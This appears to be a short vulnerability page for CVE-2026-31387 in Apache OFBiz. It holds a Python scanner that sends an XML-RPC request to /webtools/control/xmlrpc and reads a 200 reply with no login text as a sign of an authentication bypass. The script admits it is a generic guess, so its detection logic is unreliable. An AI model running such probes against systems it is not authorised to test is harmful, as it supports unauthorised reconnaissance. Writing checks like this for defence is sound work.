CVE-2026-31387 Apache OFBiz不当身份验证漏洞

# PoC for CVE-2026-31387: Apache OFBiz Improper Authentication import requests def check_vulnerability(target_url): """ Checks if the target Apache OFBiz instance is vulnerable to CVE-2026-31387. Note: This is a generic example based on the Improper Authentication description. """ # Attempting to access a restricted endpoint that should require authentication # Common sensitive paths in OFBiz might include /webtools/control/* endpoint = "/webtools/control/xmlrpc" full_url = f"{target_url}{endpoint}" headers = { "Content-Type": "application/xml", "User-Agent": "CVE-2026-31387-Scanner" } # A generic XML-RPC payload that might trigger a response if auth is bypassed payload = """<?xml version="1.0"?> <methodCall> <methodName>getServerTime</methodName> <params> </params> </methodCall>""" try: response = requests.post(full_url, data=payload, headers=headers, timeout=10, verify=False) # If the server processes the request without returning a 401/403 or login page redirect, # it might be vulnerable. Analysis of response content is required for confirmation. if response.status_code == 200 and "login" not in response.text.lower(): print(f"[+] Potential Vulnerability Detected at {full_url}") print(f"[+] Status Code: {response.status_code}") return True else: print(f"[-] Target does not appear vulnerable. Status Code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target check_vulnerability(target)